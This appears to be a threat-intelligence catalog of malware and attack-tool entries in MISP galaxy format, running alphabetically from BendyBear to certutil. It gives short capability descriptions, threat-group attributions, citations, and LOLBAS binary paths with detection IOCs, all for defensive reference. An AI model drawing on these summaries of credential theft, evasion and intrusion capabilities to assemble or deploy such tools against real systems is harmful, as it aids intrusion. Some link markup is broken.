[BendyBear](https://app.tidalcyber.com/software/a114a498-fcfd-4e0a-9d1e-e26750d71af8) is an x64 shellcode for a stage-zero implant designed to download malware from a C2 server. First discovered in August 2020, [BendyBear](https://app.tidalcyber.com/software/a114a498-fcfd-4e0a-9d1e-e26750d71af8) shares a variety of features with [Waterbear](https://app.tidalcyber.com/software/56872a5b-dc01-455c-85d5-06c577abb030), malware previously attributed to the Chinese cyber espionage group [BlackTech]([Unit42 BendyBear Feb 2021(https://app.tidalcyber.com/references/f5cbc08f-6f2c-4c81-9d68-07f61e16f138)]</sup>

The tag is: misp-galaxy:software="BendyBear"

Bginfo.exe - Associated Software

<sup>[[Bginfo.exe - LOLBAS Project](/references/ca1eaac2-7449-4a76-bec2-9dc5971fd808)]</sup>

The tag is: misp-galaxy:software="Bginfo.exe - Associated Software"

Bginfo

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Background Information Utility included with SysInternals Suite

Author: Oddvar Moe

Paths: * No fixed path

The tag is: misp-galaxy:software="Bginfo"

BianLian Ransomware (Backdoor)

This Software object represents the custom backdoor tool used during intrusions conducted by the BianLian Ransomware Group.<sup>[[U.S. CISA BianLian Ransomware May 2023](/references/aa52e826-f292-41f6-985d-0282230c8948)]</sup><sup>[[BianLian Ransomware Gang Gives It a Go! | [redacted]](/references/fc1aa979-7dbc-4fff-a8d1-b35a3b2bec3d)]</sup>

Delivers: TeamViewer<sup>[[U.S. CISA BianLian Ransomware May 2023](/references/aa52e826-f292-41f6-985d-0282230c8948)]</sup>, Atera Agent<sup>[[U.S. CISA BianLian Ransomware May 2023](/references/aa52e826-f292-41f6-985d-0282230c8948)]</sup>, Splashtop<sup>[[U.S. CISA BianLian Ransomware May 2023](/references/aa52e826-f292-41f6-985d-0282230c8948)]</sup>, AnyDesk<sup>[[U.S. CISA BianLian Ransomware May 2023](/references/aa52e826-f292-41f6-985d-0282230c8948)]</sup>

The tag is: misp-galaxy:software="BianLian Ransomware (Backdoor)"

BISCUIT

The tag is: misp-galaxy:software="BISCUIT"

Bisonal

[Bisonal](https://app.tidalcyber.com/software/b898816e-610f-4c2f-9045-d9f28a54ee58) is a remote access tool (RAT) that has been used by [Tonto Team](https://app.tidalcyber.com/groups/9f5c5672-5e7e-4440-afc8-3fdf46a1bb6c) against public and private sector organizations in Russia, South Korea, and Japan since at least December 2010.<sup>[[Unit 42 Bisonal July 2018](https://app.tidalcyber.com/references/30b2ec12-b785-43fb-ab72-b37387046d15)]</sup><sup>[[Talos Bisonal Mar 2020](https://app.tidalcyber.com/references/eaecccff-e0a0-4fa0-81e5-799b23c26b5a)]</sup>

The tag is: misp-galaxy:software="Bisonal"

FriedEx - Associated Software

<sup>[[Crowdstrike Indrik November 2018](https://app.tidalcyber.com/references/0f85f611-90db-43ba-8b71-5d0d4ec8cdd5)]</sup>

The tag is: misp-galaxy:software="FriedEx - Associated Software"

wp_encrypt - Associated Software

<sup>[[Crowdstrike Indrik November 2018](https://app.tidalcyber.com/references/0f85f611-90db-43ba-8b71-5d0d4ec8cdd5)]</sup>

The tag is: misp-galaxy:software="wp_encrypt - Associated Software"

BitPaymer

[BitPaymer](https://app.tidalcyber.com/software/e7dec940-8701-4c06-9865-5b11c61c046d) is a ransomware variant first observed in August 2017 targeting hospitals in the U.K. [BitPaymer](https://app.tidalcyber.com/software/e7dec940-8701-4c06-9865-5b11c61c046d) uses a unique encryption key, ransom note, and contact information for each operation. [BitPaymer](https://app.tidalcyber.com/software/e7dec940-8701-4c06-9865-5b11c61c046d) has several indicators suggesting overlap with the [Dridex](https://app.tidalcyber.com/software/e3cd4405-b698-41d9-88e4-fff29e7a19e2) malware and is often delivered via [Dridex]([Crowdstrike Indrik November 2018(https://app.tidalcyber.com/references/0f85f611-90db-43ba-8b71-5d0d4ec8cdd5)]</sup>

The tag is: misp-galaxy:software="BitPaymer"

Bitsadmin.exe - Associated Software

The tag is: misp-galaxy:software="Bitsadmin.exe - Associated Software"

BITSAdmin

The tag is: misp-galaxy:software="BITSAdmin"

Black Basta

[Black Basta](https://app.tidalcyber.com/software/0d5b24ba-68dc-50fa-8268-3012180fe374) is ransomware written in C++ that has been offered within the ransomware-as-a-service (RaaS) model since at least April 2022; there are variants that target Windows and VMWare ESXi servers. [Black Basta](https://app.tidalcyber.com/software/0d5b24ba-68dc-50fa-8268-3012180fe374) operations have included the double extortion technique where in addition to demanding ransom for decrypting the files of targeted organizations the cyber actors also threaten to post sensitive information to a leak site if the ransom is not paid. [Black Basta](https://app.tidalcyber.com/software/0d5b24ba-68dc-50fa-8268-3012180fe374) affiliates have targeted multiple high-value organizations, with the largest number of victims based in the U.S. Based on similarities in TTPs, leak sites, payment sites, and negotiation tactics, security researchers assess the [Black Basta](https://app.tidalcyber.com/software/0d5b24ba-68dc-50fa-8268-3012180fe374) RaaS operators could include current or former members of the [Conti](https://app.tidalcyber.com/software/8e995c29-2759-4aeb-9a0f-bb7cd97b06e5) group.<sup>[[Palo Alto Networks Black Basta August 2022](https://app.tidalcyber.com/references/fc9ee531-3680-549b-86e0-a10a70c3ec67)]</sup><sup>[[Deep Instinct Black Basta August 2022](https://app.tidalcyber.com/references/72b64d7d-f8eb-54d3-83c8-a883906ceea1)]</sup><sup>[[Minerva Labs Black Basta May 2022](https://app.tidalcyber.com/references/6358f7ed-41d6-56be-83bb-179e0a8b7873)]</sup><sup>[[Avertium Black Basta June 2022](https://app.tidalcyber.com/references/31c2ef62-2852-5418-9d52-2479a3a619d0)]</sup><sup>[[NCC Group Black Basta June 2022](https://app.tidalcyber.com/references/b5f91f77-b102-5812-a79f-69b254487da8)]</sup><sup>[[Cyble Black Basta May 2022](https://app.tidalcyber.com/references/18035aba-0ae3-58b8-b426-86c2e38a37ae)]</sup>

The tag is: misp-galaxy:software="Black Basta"

ALPHV - Associated Software

The tag is: misp-galaxy:software="ALPHV - Associated Software"

Noberus - Associated Software

The tag is: misp-galaxy:software="Noberus - Associated Software"

BlackCat

[BlackCat](https://app.tidalcyber.com/software/691369e5-ef74-5ff9-bc20-34efeb4b6c5b) is ransomware written in Rust that has been offered via the Ransomware-as-a-Service (RaaS) model. First observed November 2021, [BlackCat](https://app.tidalcyber.com/software/691369e5-ef74-5ff9-bc20-34efeb4b6c5b) has been used to target multiple sectors and organizations in various countries and regions in Africa, the Americas, Asia, Australia, and Europe.<sup>[[Microsoft BlackCat Jun 2022](https://app.tidalcyber.com/references/55be1ca7-fdb7-5d76-a9c8-5f44a0d00b0e)]</sup><sup>[[Sophos BlackCat Jul 2022](https://app.tidalcyber.com/references/481a0106-d5b6-532c-8f5b-6c0c477185f4)]</sup><sup>[[ACSC BlackCat Apr 2022](https://app.tidalcyber.com/references/3b85eaeb-6bf5-529b-80a4-439ceb6c5d6d)]</sup>

The tag is: misp-galaxy:software="BlackCat"

BLACKCOFFEE

[BLACKCOFFEE](https://app.tidalcyber.com/software/e85e2fca-9347-4448-bfc1-342f29d5d6a1) is malware that has been used by several Chinese groups since at least 2013. <sup>[[FireEye APT17](https://app.tidalcyber.com/references/a303f97a-72dd-4833-bac7-a421addc3242)]</sup> <sup>[[FireEye Periscope March 2018](https://app.tidalcyber.com/references/8edb5d2b-b5c4-4d9d-8049-43dd6ca9ab7f)]</sup>

The tag is: misp-galaxy:software="BLACKCOFFEE"

Black Energy - Associated Software

The tag is: misp-galaxy:software="Black Energy - Associated Software"

BlackEnergy

[BlackEnergy](https://app.tidalcyber.com/software/908216c7-3ad4-4e0c-9dd3-a7ed5d1c695f) is a malware toolkit that has been used by both criminal and APT actors. It dates back to at least 2007 and was originally designed to create botnets for use in conducting Distributed Denial of Service (DDoS) attacks, but its use has evolved to support various plug-ins. It is well known for being used during the confrontation between Georgia and Russia in 2008, as well as in targeting Ukrainian institutions. Variants include BlackEnergy 2 and BlackEnergy 3. <sup>[[F-Secure BlackEnergy 2014](https://app.tidalcyber.com/references/5f228fb5-d959-4c4a-bb8c-f9dc01d5af07)]</sup>

The tag is: misp-galaxy:software="BlackEnergy"

BlackMould

[BlackMould](https://app.tidalcyber.com/software/da348a51-d047-4144-9ba4-34d2ce964a11) is a web shell based on [China Chopper](https://app.tidalcyber.com/software/723c5ab7-23ca-46f2-83bb-f1d1e550122c) for servers running Microsoft IIS. First reported in December 2019, it has been used in malicious campaigns by [GALLIUM](https://app.tidalcyber.com/groups/15ff1ce0-44f0-4f1d-a4ef-83444570e572) against telecommunication providers.<sup>[[Microsoft GALLIUM December 2019](https://app.tidalcyber.com/references/5bc76b47-ff68-4031-a347-f2dc0daba203)]</sup>

The tag is: misp-galaxy:software="BlackMould"

BLINDINGCAN

[BLINDINGCAN](https://app.tidalcyber.com/software/1af8ea81-40df-4fba-8d63-1858b8b31217) is a remote access Trojan that has been used by the North Korean government since at least early 2020 in cyber operations against defense, engineering, and government organizations in Western Europe and the US.<sup>[[US-CERT BLINDINGCAN Aug 2020](https://app.tidalcyber.com/references/0421788c-b807-4e19-897c-bfb4323feb16)]</sup><sup>[[NHS UK BLINDINGCAN Aug 2020](https://app.tidalcyber.com/references/acca4c89-acce-4916-88b6-f4dac7d8ab19)]</sup>

The tag is: misp-galaxy:software="BLINDINGCAN"

BloodHound

[BloodHound](https://app.tidalcyber.com/software/72658763-8077-451e-8572-38858f8cacf3) is an Active Directory (AD) reconnaissance tool that can reveal hidden relationships and identify attack paths within an AD environment.<sup>[[GitHub Bloodhound](https://app.tidalcyber.com/references/e90b4941-5dff-4f38-b4dd-af3426fd621e)]</sup><sup>[[CrowdStrike BloodHound April 2018](https://app.tidalcyber.com/references/fa99f290-e42c-4311-9f6d-c519c9ab89fe)]</sup><sup>[[FoxIT Wocao December 2019](https://app.tidalcyber.com/references/aa3e31c7-71cd-4a3f-b482-9049c9abb631)]</sup>

The tag is: misp-galaxy:software="BloodHound"

BLUELIGHT

[BLUELIGHT](https://app.tidalcyber.com/software/3aaaaf86-638b-4a65-be18-c6e6dcdcdb97) is a remote access Trojan used by [APT37](https://app.tidalcyber.com/groups/013fdfdc-aa32-4779-8f6e-7920615cbf66) that was first observed in early 2021.<sup>[[Volexity InkySquid BLUELIGHT August 2021](https://app.tidalcyber.com/references/7e394434-364f-4e50-9a96-3e75dacc9866)]</sup>

The tag is: misp-galaxy:software="BLUELIGHT"

Bonadan

[Bonadan](https://app.tidalcyber.com/software/3793db4b-f843-4cfd-89d2-ec28b62feda5) is a malicious version of OpenSSH which acts as a custom backdoor. [Bonadan](https://app.tidalcyber.com/software/3793db4b-f843-4cfd-89d2-ec28b62feda5) has been active since at least 2018 and combines a new cryptocurrency-mining module with the same credential-stealing module used by the Onderon family of backdoors.<sup>[[ESET ForSSHe December 2018](https://app.tidalcyber.com/references/0e25bf8b-3c9e-4661-a9fd-79b2ad3b8dd2)]</sup>

The tag is: misp-galaxy:software="Bonadan"

BONDUPDATER

[BONDUPDATER](https://app.tidalcyber.com/software/d8690218-5272-47d8-8189-35d3b518e66f) is a PowerShell backdoor used by [OilRig](https://app.tidalcyber.com/groups/d01abdb1-0378-4654-aa38-1a4a292703e2). It was first observed in November 2017 during targeting of a Middle Eastern government organization, and an updated version was observed in August 2018 being used to target a government organization with spearphishing emails.<sup>[[FireEye APT34 Dec 2017](https://app.tidalcyber.com/references/88f41728-08ad-4cd8-a418-895738d68b04)]</sup><sup>[[Palo Alto OilRig Sep 2018](https://app.tidalcyber.com/references/2ec6eabe-92e2-454c-ba7b-b27fec5b428d)]</sup>

The tag is: misp-galaxy:software="BONDUPDATER"

BoomBox

[BoomBox](https://app.tidalcyber.com/software/9d393f6f-855e-4348-8a26-008174e3605a) is a downloader responsible for executing next stage components that has been used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) since at least 2021.<sup>[[MSTIC Nobelium Toolset May 2021](https://app.tidalcyber.com/references/52464e69-ff9e-4101-9596-dd0c6404bf76)]</sup>

The tag is: misp-galaxy:software="BoomBox"

BOOSTWRITE

[BOOSTWRITE](https://app.tidalcyber.com/software/74a73624-d53b-4c84-a14b-8ae964fd577c) is a loader crafted to be launched via abuse of the DLL search order of applications used by [FIN7]([FireEye FIN7 Oct 2019(https://app.tidalcyber.com/references/df8886d1-fbd7-4c24-8ab1-6261923dee96)]</sup>

The tag is: misp-galaxy:software="BOOSTWRITE"

BOOTRASH

[BOOTRASH](https://app.tidalcyber.com/software/d47a4753-80f5-494e-aad7-d033aaff0d6d) is a [Bootkit](https://app.tidalcyber.com/technique/032985de-5e09-4889-b8c4-84d940c6346c) that targets Windows operating systems. It has been used by threat actors that target the financial sector.<sup>[[Mandiant M Trends 2016](https://app.tidalcyber.com/references/f769a3ac-4330-46b7-bed8-61697e22cd24)]</sup><sup>[[FireEye Bootkits](https://app.tidalcyber.com/references/585827a8-1f03-439d-b66e-ad5290117c1b)]</sup><sup>[[FireEye BOOTRASH SANS](https://app.tidalcyber.com/references/835c9e5d-b291-43d9-9b8a-2978aa8c8cd3)]</sup>

The tag is: misp-galaxy:software="BOOTRASH"

BoxCaon

[BoxCaon](https://app.tidalcyber.com/software/d3e46011-3433-426c-83b3-61c2576d5f71) is a Windows backdoor that was used by [IndigoZebra](https://app.tidalcyber.com/groups/988f5312-834e-48ea-93b7-e6e01ee0938d) in a 2021 spearphishing campaign against Afghan government officials. [BoxCaon](https://app.tidalcyber.com/software/d3e46011-3433-426c-83b3-61c2576d5f71)'s name stems from similarities shared with the malware family [xCaon]([Checkpoint IndigoZebra July 2021(https://app.tidalcyber.com/references/cf4a8c8c-eab1-421f-b313-344aed03b42d)]</sup>

The tag is: misp-galaxy:software="BoxCaon"

Brave Prince

[Brave Prince](https://app.tidalcyber.com/software/51b27e2c-c737-4006-a657-195ea1a1f4f0) is a Korean-language implant that was first observed in the wild in December 2017. It contains similar code and behavior to [Gold Dragon](https://app.tidalcyber.com/software/348fdeb5-6a74-4803-ac6e-e0133ecd7263), and was seen along with [Gold Dragon](https://app.tidalcyber.com/software/348fdeb5-6a74-4803-ac6e-e0133ecd7263) and [RunningRAT](https://app.tidalcyber.com/software/e8afda1f-fa83-4fc3-b6fb-7d5daca7173f) in operations surrounding the 2018 Pyeongchang Winter Olympics. <sup>[[McAfee Gold Dragon](https://app.tidalcyber.com/references/4bdfa92b-cbbd-43e6-aa3e-422561ff8d7a)]</sup>

The tag is: misp-galaxy:software="Brave Prince"

Briba

[Briba](https://app.tidalcyber.com/software/7942783c-73a7-413c-94d1-8981029a1c51) is a trojan used by [Elderwood](https://app.tidalcyber.com/groups/51146bb6-7478-44a3-8f08-19adcdceffca) to open a backdoor and download files on to compromised hosts. <sup>[[Symantec Elderwood Sept 2012](https://app.tidalcyber.com/references/5e908748-d260-42f1-a599-ac38b4e22559)]</sup> <sup>[[Symantec Briba May 2012](https://app.tidalcyber.com/references/bcf0f82b-1b26-4c0c-905e-0dd8b88d0903)]</sup>

The tag is: misp-galaxy:software="Briba"

BRc4 - Associated Software

<sup>[[Palo Alto Brute Ratel July 2022](https://app.tidalcyber.com/references/a9ab0444-386b-5baf-84e1-0e6df4a21296)]</sup>

The tag is: misp-galaxy:software="BRc4 - Associated Software"

Brute Ratel C4

[Brute Ratel C4](https://app.tidalcyber.com/software/23043b44-69a6-5cdf-8f60-5a68068680c7) is a commercial red-teaming and adversarial attack simulation tool that first appeared in December 2020. [Brute Ratel C4](https://app.tidalcyber.com/software/23043b44-69a6-5cdf-8f60-5a68068680c7) was specifically designed to avoid detection by endpoint detection and response (EDR) and antivirus (AV) capabilities, and deploys agents called badgers to enable arbitrary command execution for lateral movement, privilege escalation, and persistence. In September 2022, a cracked version of [Brute Ratel C4](https://app.tidalcyber.com/software/23043b44-69a6-5cdf-8f60-5a68068680c7) was leaked in the cybercriminal underground, leading to its use by threat actors.<sup>[[Dark Vortex Brute Ratel C4](https://app.tidalcyber.com/references/47992cb5-df11-56c2-b266-6f58d75f8315)]</sup><sup>[[Palo Alto Brute Ratel July 2022](https://app.tidalcyber.com/references/a9ab0444-386b-5baf-84e1-0e6df4a21296)]</sup><sup>[[MDSec Brute Ratel August 2022](https://app.tidalcyber.com/references/dfd12595-0056-5b4a-b753-624fac1bb3a6)]</sup><sup>[[SANS Brute Ratel October 2022](https://app.tidalcyber.com/references/9544e762-6f72-59e7-8384-5bbef13bfe96)]</sup><sup>[[Trend Micro Black Basta October 2022](https://app.tidalcyber.com/references/6e4a1565-4a30-5a6b-961c-226a6f1967ae)]</sup>

The tag is: misp-galaxy:software="Brute Ratel C4"

BS2005

[BS2005](https://app.tidalcyber.com/software/c9e773de-0213-4b64-83fb-637060c8b5ed) is malware that was used by [Ke3chang](https://app.tidalcyber.com/groups/26c0925f-1a3c-4df6-b27a-62b9731299b8) in spearphishing campaigns since at least 2011. <sup>[[Mandiant Operation Ke3chang November 2014](https://app.tidalcyber.com/references/bb45cf96-ceae-4f46-a0f5-08cd89f699c9)]</sup>

The tag is: misp-galaxy:software="BS2005"

Backdoor.APT.FakeWinHTTPHelper - Associated Software

The tag is: misp-galaxy:software="Backdoor.APT.FakeWinHTTPHelper - Associated Software"

BUBBLEWRAP

[BUBBLEWRAP](https://app.tidalcyber.com/software/2be4e3d2-e8c5-4406-8041-2c17bdb3a547) is a full-featured, second-stage backdoor used by the [admin@338](https://app.tidalcyber.com/groups/8567136b-f84a-45ed-8cce-46324c7da60e) group. It is set to run when the system boots and includes functionality to check, upload, and register plug-ins that can further enhance its capabilities. <sup>[[FireEye admin@338](https://app.tidalcyber.com/references/f3470275-9652-440e-914d-ad4fc5165413)]</sup>

The tag is: misp-galaxy:software="BUBBLEWRAP"

build_downer

The tag is: misp-galaxy:software="build_downer"

Bumblebee

[Bumblebee](https://app.tidalcyber.com/software/cc155181-fb34-4aaf-b083-b7b57b140b7a) is a custom loader written in C++ that has been used by multiple threat actors, including possible initial access brokers, to download and execute additional payloads since at least March 2022. [Bumblebee](https://app.tidalcyber.com/software/cc155181-fb34-4aaf-b083-b7b57b140b7a) has been linked to ransomware operations including [Conti](https://app.tidalcyber.com/software/8e995c29-2759-4aeb-9a0f-bb7cd97b06e5), Quantum, and Mountlocker and derived its name from the appearance of "bumblebee" in the user-agent.<sup>[[Google EXOTIC LILY March 2022](https://app.tidalcyber.com/references/19d2cb48-bdb2-41fe-ba24-0769d7bd4d94)]</sup><sup>[[Proofpoint Bumblebee April 2022](https://app.tidalcyber.com/references/765b0ce9-7305-4b35-b5be-2f6f42339646)]</sup><sup>[[Symantec Bumblebee June 2022](https://app.tidalcyber.com/references/81bfabad-b5b3-4e45-ac1d-1e2e829fca33)]</sup>

The tag is: misp-galaxy:software="Bumblebee"

OSX.Bundlore - Associated Software

The tag is: misp-galaxy:software="OSX.Bundlore - Associated Software"

Bundlore

[Bundlore](https://app.tidalcyber.com/software/e9873bf1-9619-4c62-b4cf-1009e83de186) is adware written for macOS that has been in use since at least 2015. Though categorized as adware, [Bundlore](https://app.tidalcyber.com/software/e9873bf1-9619-4c62-b4cf-1009e83de186) has many features associated with more traditional backdoors.<sup>[[MacKeeper Bundlore Apr 2019](https://app.tidalcyber.com/references/4d631c9a-4fd5-43a4-8b78-4219bd371e87)]</sup>

The tag is: misp-galaxy:software="Bundlore"

Cachedump

[Cachedump](https://app.tidalcyber.com/software/7c03fb92-3cd8-4ce4-a1e0-75e47465e4bc) is a publicly-available tool that program extracts cached password hashes from a system’s registry. <sup>[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]</sup>

The tag is: misp-galaxy:software="Cachedump"

CaddyWiper

[CaddyWiper](https://app.tidalcyber.com/software/62d0ddcd-790d-4d2d-9d94-276f54b40cf0) is a destructive data wiper that has been used in attacks against organizations in Ukraine since at least March 2022.<sup>[[ESET CaddyWiper March 2022](https://app.tidalcyber.com/references/9fa97444-311f-40c1-8728-c5f91634c750)]</sup><sup>[[Cisco CaddyWiper March 2022](https://app.tidalcyber.com/references/88fc1f96-2d55-4c92-a929-234248490c30)]</sup>

The tag is: misp-galaxy:software="CaddyWiper"

CALENDAR

The tag is: misp-galaxy:software="CALENDAR"

Calisto

[Calisto](https://app.tidalcyber.com/software/6b5b408c-4f9d-4137-bfb1-830d12e9736c) is a macOS Trojan that opens a backdoor on the compromised machine. [Calisto](https://app.tidalcyber.com/software/6b5b408c-4f9d-4137-bfb1-830d12e9736c) is believed to have first been developed in 2016. <sup>[[Securelist Calisto July 2018](https://app.tidalcyber.com/references/a292d77b-9150-46ea-b217-f51e091fdb57)]</sup> <sup>[[Symantec Calisto July 2018](https://app.tidalcyber.com/references/cefef3d8-94f5-4d94-9689-6ed38702454f)]</sup>

The tag is: misp-galaxy:software="Calisto"

CallMe

[CallMe](https://app.tidalcyber.com/software/352ee271-89e6-4d3f-9c26-98dbab0e2986) is a Trojan designed to run on Apple OSX. It is based on a publicly available tool called Tiny SHell. <sup>[[Scarlet Mimic Jan 2016](https://app.tidalcyber.com/references/f84a5b6d-3af1-45b1-ac55-69ceced8735f)]</sup>

The tag is: misp-galaxy:software="CallMe"

Cannon

[Cannon](https://app.tidalcyber.com/software/790e931d-2571-496d-9f48-322774a7d482) is a Trojan with variants written in C# and Delphi. It was first observed in April 2018. <sup>[[Unit42 Cannon Nov 2018](https://app.tidalcyber.com/references/8c634bbc-4878-4b27-aa18-5996ec968809)]</sup><sup>[[Unit42 Sofacy Dec 2018](https://app.tidalcyber.com/references/540c4c33-d4c2-4324-94cd-f57646666e32)]</sup>

The tag is: misp-galaxy:software="Cannon"

Anunak - Associated Software

The tag is: misp-galaxy:software="Anunak - Associated Software"

Carbanak

[Carbanak](https://app.tidalcyber.com/software/4cb9294b-9e4c-41b9-b640-46213a01952d) is a full-featured, remote backdoor used by a group of the same name ([Carbanak](https://app.tidalcyber.com/groups/72d9bea7-9ca1-43e6-8702-2fb7fb1355de)). It is intended for espionage, data exfiltration, and providing remote access to infected machines. <sup>[[Kaspersky Carbanak](https://app.tidalcyber.com/references/2f7e77db-fe39-4004-9945-3c8943708494)]</sup> <sup>[[FireEye CARBANAK June 2017](https://app.tidalcyber.com/references/39105492-6044-460c-9dc9-3d4473ee862e)]</sup>

The tag is: misp-galaxy:software="Carbanak"

Carberp

[Carberp](https://app.tidalcyber.com/software/df9491fd-5e24-4548-8e21-1268dce59d1f) is a credential and information stealing malware that has been active since at least 2009. [Carberp](https://app.tidalcyber.com/software/df9491fd-5e24-4548-8e21-1268dce59d1f)'s source code was leaked online in 2013, and subsequently used as the foundation for the [Carbanak](https://app.tidalcyber.com/software/4cb9294b-9e4c-41b9-b640-46213a01952d) backdoor.<sup>[[Trend Micro Carberp February 2014](https://app.tidalcyber.com/references/069e458f-d780-47f9-8ebe-21b195fe9b33)]</sup><sup>[[KasperskyCarbanak](https://app.tidalcyber.com/references/053a2bbb-5509-4aba-bbd7-ccc3d8074291)]</sup><sup>[[RSA Carbanak November 2017](https://app.tidalcyber.com/references/eb947d49-26f4-4104-8296-1552a273c9c3)]</sup>

The tag is: misp-galaxy:software="Carberp"

Carbon

[Carbon](https://app.tidalcyber.com/software/61f5d19c-1da2-43d1-ab20-51eacbca71f2) is a sophisticated, second-stage backdoor and framework that can be used to steal sensitive information from victims. [Carbon](https://app.tidalcyber.com/software/61f5d19c-1da2-43d1-ab20-51eacbca71f2) has been selectively used by [Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2) to target government and foreign affairs-related organizations in Central Asia.<sup>[[ESET Carbon Mar 2017](https://app.tidalcyber.com/references/5d2a3a81-e7b7-430d-b748-b773f89d3c77)]</sup><sup>[[Securelist Turla Oct 2018](https://app.tidalcyber.com/references/5b08ea46-e25d-4df9-9b91-f8e7a1d5f7ee)]</sup>

The tag is: misp-galaxy:software="Carbon"

Cardinal RAT

[Cardinal RAT](https://app.tidalcyber.com/software/fa23acef-3034-43ee-9610-4fc322f0d80b) is a potentially low volume remote access trojan (RAT) observed since December 2015. [Cardinal RAT](https://app.tidalcyber.com/software/fa23acef-3034-43ee-9610-4fc322f0d80b) is notable for its unique utilization of uncompiled C# source code and the Microsoft Windows built-in csc.exe compiler.<sup>[[PaloAlto CardinalRat Apr 2017](https://app.tidalcyber.com/references/8d978b94-75c9-46a1-812a-bafe3396eda9)]</sup>

The tag is: misp-galaxy:software="Cardinal RAT"

CARROTBALL

The tag is: misp-galaxy:software="CARROTBALL"

CARROTBAT

The tag is: misp-galaxy:software="CARROTBAT"

Catchamas

[Catchamas](https://app.tidalcyber.com/software/04deccb5-9850-45c3-a900-5d7039a94190) is a Windows Trojan that steals information from compromised systems. <sup>[[Symantec Catchamas April 2018](https://app.tidalcyber.com/references/155cc2df-adf4-4b5f-a377-272947e5757e)]</sup>

The tag is: misp-galaxy:software="Catchamas"

Caterpillar WebShell

The tag is: misp-galaxy:software="Caterpillar WebShell"

CC-Attack

CC-Attack is a publicly available script that automates the use of open, external proxy servers as part of denial of service flood attacks. Its use has been promoted among the members of the Killnet hacktivist collective.<sup>[[Flashpoint Glossary Killnet](/references/502cc03b-350b-4e2d-9436-364c43a0a203)]</sup>

The tag is: misp-galaxy:software="CC-Attack"

CCBkdr

[CCBkdr](https://app.tidalcyber.com/software/4eb0720c-7046-4ff1-adfd-ae603506e499) is malware that was injected into a signed version of CCleaner and distributed from CCleaner’s distribution website. <sup>[[Talos CCleanup 2017](https://app.tidalcyber.com/references/f2522cf4-dc65-4dc5-87e3-9e88212fcfe9)]</sup> <sup>[[Intezer Aurora Sept 2017](https://app.tidalcyber.com/references/b2999bd7-50d5-4d49-8893-8c0903d49104)]</sup>

The tag is: misp-galaxy:software="CCBkdr"

ccf32

[ccf32](https://app.tidalcyber.com/software/e00c2a0c-bbe5-4eff-b0ad-b2543456a317) is data collection malware that has been used since at least February 2019, most notably during the [FunnyDream](https://app.tidalcyber.com/campaigns/94587edf-0292-445b-8c66-b16629597f1e) campaign; there is also a similar x64 version.<sup>[[Bitdefender FunnyDream Campaign November 2020](https://app.tidalcyber.com/references/b62a9f2c-02ca-4dfa-95fc-5dc6ad9568de)]</sup>

The tag is: misp-galaxy:software="ccf32"

Cdb.exe - Associated Software

<sup>[[Cdb.exe - LOLBAS Project](/references/e61b035f-6247-47e3-918c-2892815dfddf)]</sup>

The tag is: misp-galaxy:software="Cdb.exe - Associated Software"

Cdb

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Debugging tool included with Windows Debugging Tools.

Author: Oddvar Moe

Paths: * C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe * C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe

The tag is: misp-galaxy:software="Cdb"

CertOC.exe - Associated Software

<sup>[[CertOC.exe - LOLBAS Project](/references/b906498e-2773-419b-8c6d-3e974925ac18)]</sup>

The tag is: misp-galaxy:software="CertOC.exe - Associated Software"

CertOC

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used for installing certificates

Author: Ensar Samil

Paths: * c:\windows\system32\certoc.exe * c:\windows\syswow64\certoc.exe

Detection: * Sigma: [proc_creation_win_certoc_load_dll.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certoc_load_dll.yml) * IOC: Process creation with given parameter * IOC: Unsigned DLL load via certoc.exe * IOC: Network connection via certoc.exe<sup>[[CertOC.exe - LOLBAS Project](/references/b906498e-2773-419b-8c6d-3e974925ac18)]</sup>

The tag is: misp-galaxy:software="CertOC"

CertReq.exe - Associated Software

<sup>[[CertReq.exe - LOLBAS Project](/references/be446484-8ecc-486e-8940-658c147f6978)]</sup>

The tag is: misp-galaxy:software="CertReq.exe - Associated Software"

CertReq

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Used for requesting and managing certificates

Author: David Middlehurst

Paths: * C:\Windows\System32\certreq.exe * C:\Windows\SysWOW64\certreq.exe

Detection: * Sigma: [proc_creation_win_lolbin_susp_certreq_download.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml) * IOC: certreq creates new files * IOC: certreq makes POST requests<sup>[[CertReq.exe - LOLBAS Project](/references/be446484-8ecc-486e-8940-658c147f6978)]</sup>

The tag is: misp-galaxy:software="CertReq"

certutil.exe - Associated Software

The tag is: misp-galaxy:software="certutil.exe - Associated Software"

certutil

[certutil](https://app.tidalcyber.com/software/2fe21578-ee31-4ee8-b6ab-b5f76f97d043) is a command-line utility that can be used to obtain certificate authority information and configure Certificate Services. <sup>[[TechNet Certutil](https://app.tidalcyber.com/references/8d095aeb-c72c-49c1-8482-dbf4ce9203ce)]</sup>

The tag is: misp-galaxy:software="certutil"

Chaes

